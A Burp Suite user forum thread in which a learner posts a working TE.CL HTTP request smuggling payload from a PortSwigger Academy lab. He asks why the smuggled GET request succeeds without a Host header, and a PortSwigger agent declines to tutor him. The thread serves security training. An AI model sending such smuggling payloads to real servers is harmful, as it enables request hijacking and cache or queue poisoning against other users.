Burp Suite User Forum

Create new post

Lab: HTTP request smuggling, basic TE.CL vulnerability

Mikhail | Last updated: Sep 19, 2024 03:33PM UTC

Hello! Can you help me understand one interesting moment in this lab? In this lab, smuggling request will be succesful. POST / HTTP/1.1 Host: 0a5e00970446a1b38002d12d005f0084.web-security-academy.net Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 68 GET /post?postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 But how can we send smuggled request without Header Host? It is necessary for HTTP1.1.

Ben, PortSwigger Agent | Last updated: Sep 23, 2024 01:10PM UTC

Hi Mikhail, Are you able to clarify your question, please?

Mikhail | Last updated: Sep 23, 2024 03:16PM UTC

Hi Ben! This part of request is waiting for a second request on backend GET /post?postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 And it's OK! We are sending the second part. Backend have gote something like this GET /post?postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0 POST / HTTP/1.1 Host: 0a5e00970446a1b38002d12d005f0084.web-security-academy.net Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 ... And it's work! We have response for this request GET /post?postId=9 HTTP/1.1 .... BUT! If we see on this request attentivly, we don't find header "Host:". How can we do this request without header "Host"? HTTP1.1 can't send requests without header "Host".

Ben, PortSwigger Agent | Last updated: Sep 26, 2024 05:26PM UTC

Hi Mikhail, Unfortunately, we are unable to provide personal support or tutoring to Academy users in order to explain concepts beyond the learning materials provided in the Web Academy. If you would like to discuss this with other Burp and Web Academy users we do now have a Discord server where you can interact with others. You can join this below: https://discord.com/invite/portswigger

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.